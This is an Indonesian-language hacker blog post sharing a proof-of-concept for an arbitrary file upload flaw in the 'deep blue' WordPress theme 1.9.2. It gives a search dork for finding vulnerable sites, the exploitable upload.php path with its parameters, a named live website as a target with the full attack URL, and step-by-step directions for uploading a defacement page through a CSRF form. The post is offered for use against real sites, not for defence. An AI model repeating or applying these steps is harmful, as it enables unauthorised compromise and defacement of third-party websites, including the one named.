• ok, kali ini w akan share poc kesenengan gw xD deep blue themes 1.9.2 , walaupun emang susah dapet site, kgk jago dorking :'( 
ok tanpa cocote lagi, langsung sadja

  • dork : inurl:/wp-content/themes/deep-blue/ (pikir sendiri ya, w kga jaog dorking :'v)
  • exploit : /megaframe/megapanel/inc/upload.php
  • exploit tambahan : ?folder=/&fileext=htm (file ext bisa kalian ganti, jadi html ato htm. php mungkin bisa maybe.. idk)
live target : www.happysurprisecompany.com

nah nanti jadinya begini > www.happysurprisecompany.com/megaframe/megapanel/inc/upload.php?folder=/&fileext=htm

paham? kalau paham lanjut.

  • pertama cek dulu web vuln kgk, vuln biasanya blank
  • masukin site ke csrf kalian atau bisa pake punya gw >disini jgn lupa arraynya Filedata
  • kunci target, masukan file. sesuai dengan fileext di exploit tambahan.
  • upload. kebetulan gw pilih ngindex.htm. pokoknya filenya harus sesuai. xD
  • sip, mantap :v .. berhasil di upload. tinggal di akses dah :v
terimakasih udah baca, jangan lupa share biar gw rajin post. dan jgn lupa klik iklan di label iklan :'v (gw sih kga mentingin duid sih :'v )
greetz : Indonesian freedom security - n45ht - hentaic0de - xai syndicate

Post a Comment